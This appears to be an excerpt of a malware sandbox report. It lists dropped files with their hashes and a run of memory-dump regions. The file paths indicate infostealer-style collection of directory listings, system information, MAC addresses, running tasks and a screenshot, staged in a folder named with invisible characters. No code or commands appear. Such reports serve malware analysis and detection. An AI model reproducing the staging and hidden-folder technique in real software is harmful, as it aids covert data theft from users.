b3fdf1f470a170441695674cc0406e6e7bce3e2d6095a900291c47080cfc0e7f3977d7570a69ce0c41368e34ac6a0b176723c21d52f2e26a2ebd2062a9cb3dfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5916_574292734\62c6b010-762e-4239-9b93-9a795fc4d424.tmp

Filesize
150KB

MD5
14937b985303ecce4196154a24fc369a

SHA1
ecfe89e11a8d08ce0c8745ff5735d5edad683730

SHA256
71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

SHA512
1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\Directories\Desktop.txt

Filesize
707B

MD5
48891525a95ee32a630416da8f5e9404

SHA1
6702ad7e49ac8be4f4c885a8ae603d199c69d626

SHA256
148b0a8ce7dcd252a187781e28ecea1469eb14d28a41498f15f64178888f248b

SHA512
be475ce6c68a94484d1fa24b733d467d19e9d578e6cc15614d7a33b2a7d58454c594ecac174aa10a112b61c08080661611b10331eecef0052ab2f84be6f2947b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\Directories\Documents.txt

Filesize
618B

MD5
935b685234b7da3a7b238bdedc52d0a6

SHA1
2158f9c0bf830732f1c58f502820fab5b258d4fc

SHA256
6d0aa28252581abe8ce5e3cb435f665003bd5adc78336d356dabdb440068440b

SHA512
4ac365c2651d9854556c522fd4bab5258e61819996990c9296a8cb4eb43ee1b32443224e441320d64943e1392a53b1e317fa2c858b32261543760b3a30155eee

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\Directories\Downloads.txt

Filesize
741B

MD5
9adaf4130e971ac0d50951bc7da88266

SHA1
6c7e3f424ad26dd30adc9f5f9f19ebd94459288f

SHA256
812e3759a83e4f719a8e17d730e3dfcf58a6bd8ee466cb01a7d893fffeac6f91

SHA512
b6a3882e13f0c49d297cff748aa598ebf22e9ed1a723641e88eddc04ff786cf9d93c273cd1f7345308430082442b6ad7c57a5338df79f555e9608f5ecfe67430

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\Directories\Music.txt

Filesize
349B

MD5
7573a7adf8ecf1ba4b49fffac264ed2c

SHA1
113d1a101d07b880aade2bd35948acedbf6e8f2b

SHA256
b85b811250095e579eaa24e6aefb8acaccfc1ddffbd39f4a2635d301e6912639

SHA512
132ba60718f140ecf230dbcbaf86ab16611d87dfbd41f9354b7122a241f2175e0c0766c86c01d33a3524f046c889aed15bde50d45204f2957e4d151de666d9b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\Directories\Pictures.txt

Filesize
491B

MD5
3f95451b6b1e7c6cf43f66673458c266

SHA1
981c37723987e3ffc09ab307d31d2c590009606a

SHA256
088f1e010ebdb648f59e285cad208c3b88e47fd17ba6d603742d8ec7b23dc1ff

SHA512
89e0108a5e0d9d726e6d0b7a7fcede5152e98866e8de8cc17e30edea5392c3a8fb0e180e7ccaaa567c0672589c3318e7f73dd8aac56b4392f255a20b64c7fe82

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\Display (1).png

Filesize
411KB

MD5
c75c5ed4d03a3ec632fc7de79686e366

SHA1
a087ae68232172381e7a30278c8f86de94e90c37

SHA256
e5545444699cb33085498c71e7523d164f34a456ff96ad33841f9c8fd1d67c79

SHA512
956cffc60e9f4bfe2e9d580d2be23cfd332a5055949151b0f75a466ca737918fb35d036c8660b6efdece8cbc32fab970ab8512fc67304da9660fd8d68122f5ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\System\MAC Addresses.txt

Filesize
232B

MD5
d4302006a118b596f01b306de2193f8e

SHA1
a79c77560ed7bc790f8f1ca27289adb32fb2df42

SHA256
59be65260e049ac3b0b31c9a36f85d54873d522a70ea3399cc17ba87902a11c7

SHA512
a9e6e4e0469232a17462ac91d32776002210fff2d8294214eb7e9df68f2da923a11f7d3cf4d3085badf7237546718788be61960db1c42327473524c05f9957b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\System\System Info.txt

Filesize
2KB

MD5
18924ab7dbeb7758d9b58001e5942b82

SHA1
51f854145c0dbd27c2ce42cf0b48935f0aa18393

SHA256
ff8d211200eee11c18bbe3df04a050d88572982b419772066213736dbbb88fa7

SHA512
bdb47a67ce7596640624964863b3cbce809e03d8cf0cfb1c1617480a91c8661f98cdd5d34dc3af18d3474467bca4cf4c91f71e5653da76b2cedbb5f19767dcb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‍ ‎ ‎\System\Task List.txt

Filesize
11KB

MD5
e63e2013881bc17a1aa38f39bf8cbdda

SHA1
c77067507538f477b6e0e312bd878b7b04194ee4

SHA256
aa38420ceaf621a35e3d26fc97ad6453434c07a85ed9085eabe3c15dbf772603

SHA512
3b8551022285ffb2682e77abaccb82eaa037952fb19336fa9afac61c70dee47412d58cf28b639781934ac999cb9464e726ef64a7acb2553e2a5546b6fdc8797c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\alkqdhrs\CSCFFCB2701FF4954BC9791D495496A7A.TMP

Filesize
652B

MD5
b7390f1aa592086203026e0e95495230

SHA1
3aa12d4a0d0002dab1588b217e798e0698fdff39

SHA256
931d2dcb7656f2f46b07e76e2b05d461798736dc55db4b60825438141781432e

SHA512
4bdf2420c6692d31e1ec2cea015400c9025f6db1337f2eae86c92b48aaf5aebf6a0869d57f5646d8f287ca0dfe5994af93358a826245c89f4424abb86f793935

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\alkqdhrs\alkqdhrs.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\alkqdhrs\alkqdhrs.cmdline

Filesize
607B

MD5
d3e46becabfc744773212ce06e7f2cf1

SHA1
8eb7b3eed778212b4f0de11af3c98a6112bf20ac

SHA256
df90594d430d9ebc6eb7d55fcff953928bcf8cb87bfb1c507701953c924ec760

SHA512
9ff737844d9a75d2b2a792e7aaf8116cc7c14b8a0ed98f399fd9d5d1da2130668ff433b964fc45c57df7d2f542617595bca0fee7feb1fab8d3f30efe8ceb7c89

Download Submit
memory/1692-641-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-637-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-638-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-639-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-640-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-642-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-643-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-631-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-632-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/1692-633-0x00000272C1B50000-0x00000272C1B51000-memory.dmp

Filesize
4KB

Download
memory/2228-121-0x000001AB27C90000-0x000001AB27EAC000-memory.dmp

Filesize
2.1MB

Download
memory/2504-80-0x00007FF9EF380000-0x00007FF9EF38D000-memory.dmp

Filesize
52KB

Download
memory/2504-166-0x00007FF9EF390000-0x00007FF9EF3C3000-memory.dmp

Filesize
204KB

Download
memory/2504-234-0x00007FF9EEEA0000-0x00007FF9EEEB4000-memory.dmp

Filesize
80KB

Download
memory/2504-237-0x00007FF9DEC10000-0x00007FF9DF143000-memory.dmp

Filesize
5.2MB

Download
memory/2504-238-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp

Filesize
148KB

Download
memory/2504-239-0x00007FF9F8B50000-0x00007FF9F8B5F000-memory.dmp

Filesize
60KB

Download
memory/2504-240-0x00007FF9EF0D0000-0x00007FF9EF0FD000-memory.dmp

Filesize
180KB

Download
memory/2504-241-0x00007FF9EF360000-0x00007FF9EF37A000-memory.dmp

Filesize
104KB

Download
memory/2504-242-0x00007FF9EF0A0000-0x00007FF9EF0C4000-memory.dmp

Filesize
144KB

Download
memory/2504-243-0x00007FF9DEAF0000-0x00007FF9DEC0A000-memory.dmp

Filesize
1.1MB

Download
memory/2504-244-0x00007FF9F3130000-0x00007FF9F3149000-memory.dmp

Filesize
100KB

Download
memory/2504-245-0x00007FF9EFEF0000-0x00007FF9EFEFD000-memory.dmp

Filesize
52KB

Download
memory/2504-246-0x00007FF9EF390000-0x00007FF9EF3C3000-memory.dmp

Filesize
204KB

Download
memory/2504-247-0x00007FF9EAB90000-0x00007FF9EAC5E000-memory.dmp

Filesize
824KB

Download
memory/2504-235-0x00007FF9EF380000-0x00007FF9EF38D000-memory.dmp

Filesize
52KB

Download
memory/2504-222-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp

Filesize
6.8MB

Download
memory/2504-191-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp

Filesize
1.5MB

Download
memory/2504-185-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp

Filesize
6.8MB

Download
memory/2504-199-0x00007FF9DEAF0000-0x00007FF9DEC0A000-memory.dmp

Filesize
1.1MB

Download
memory/2504-186-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp

Filesize
148KB

Download
memory/2504-170-0x00007FF9DEC10000-0x00007FF9DF143000-memory.dmp

Filesize
5.2MB

Download
memory/2504-168-0x00000159ABB20000-0x00000159AC053000-memory.dmp

Filesize
5.2MB

Download
memory/2504-167-0x00007FF9EAB90000-0x00007FF9EAC5E000-memory.dmp

Filesize
824KB

Download
memory/2504-228-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp

Filesize
1.5MB

Download
memory/2504-25-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp

Filesize
6.8MB

Download
memory/2504-30-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp

Filesize
148KB

Download
memory/2504-32-0x00007FF9F8B50000-0x00007FF9F8B5F000-memory.dmp

Filesize
60KB

Download
memory/2504-83-0x00007FF9EF0A0000-0x00007FF9EF0C4000-memory.dmp

Filesize
144KB

Download
memory/2504-84-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp

Filesize
1.5MB

Download
memory/2504-76-0x00007FF9EEEA0000-0x00007FF9EEEB4000-memory.dmp

Filesize
80KB

Download
memory/2504-81-0x00007FF9EF360000-0x00007FF9EF37A000-memory.dmp

Filesize
104KB

Download
memory/2504-82-0x00007FF9DEAF0000-0x00007FF9DEC0A000-memory.dmp

Filesize
1.1MB

Download
memory/2504-78-0x00007FF9EF0D0000-0x00007FF9EF0FD000-memory.dmp

Filesize
180KB

Download
memory/2504-71-0x00007FF9EAB90000-0x00007FF9EAC5E000-memory.dmp

Filesize
824KB

Download
memory/2504-73-0x00007FF9DEC10000-0x00007FF9DF143000-memory.dmp

Filesize
5.2MB

Download
memory/2504-74-0x00007FF9F31A0000-0x00007FF9F31C5000-memory.dmp

Filesize
148KB

Download
memory/2504-72-0x00000159ABB20000-0x00000159AC053000-memory.dmp

Filesize
5.2MB

Download
memory/2504-70-0x00007FF9DFDF0000-0x00007FF9E04B5000-memory.dmp

Filesize
6.8MB

Download
memory/2504-66-0x00007FF9EF390000-0x00007FF9EF3C3000-memory.dmp

Filesize
204KB

Download
memory/2504-64-0x00007FF9EFEF0000-0x00007FF9EFEFD000-memory.dmp

Filesize
52KB

Download
memory/2504-62-0x00007FF9F3130000-0x00007FF9F3149000-memory.dmp

Filesize
100KB

Download
memory/2504-60-0x00007FF9DF870000-0x00007FF9DF9EF000-memory.dmp

Filesize
1.5MB

Download
memory/2504-58-0x00007FF9EF0A0000-0x00007FF9EF0C4000-memory.dmp

Filesize
144KB

Download
memory/2504-56-0x00007FF9EF360000-0x00007FF9EF37A000-memory.dmp

Filesize
104KB

Download
memory/2504-54-0x00007FF9EF0D0000-0x00007FF9EF0FD000-memory.dmp

Filesize
180KB

Download
memory/4176-90-0x000002966A360000-0x000002966A382000-memory.dmp

Filesize
136KB

Download
memory/4956-150-0x000001E2B15A0000-0x000001E2B15A8000-memory.dmp

Filesize
32KB

Download
memory/4956-154-0x000001E2B1260000-0x000001E2B147C000-memory.dmp

Filesize
2.1MB

Download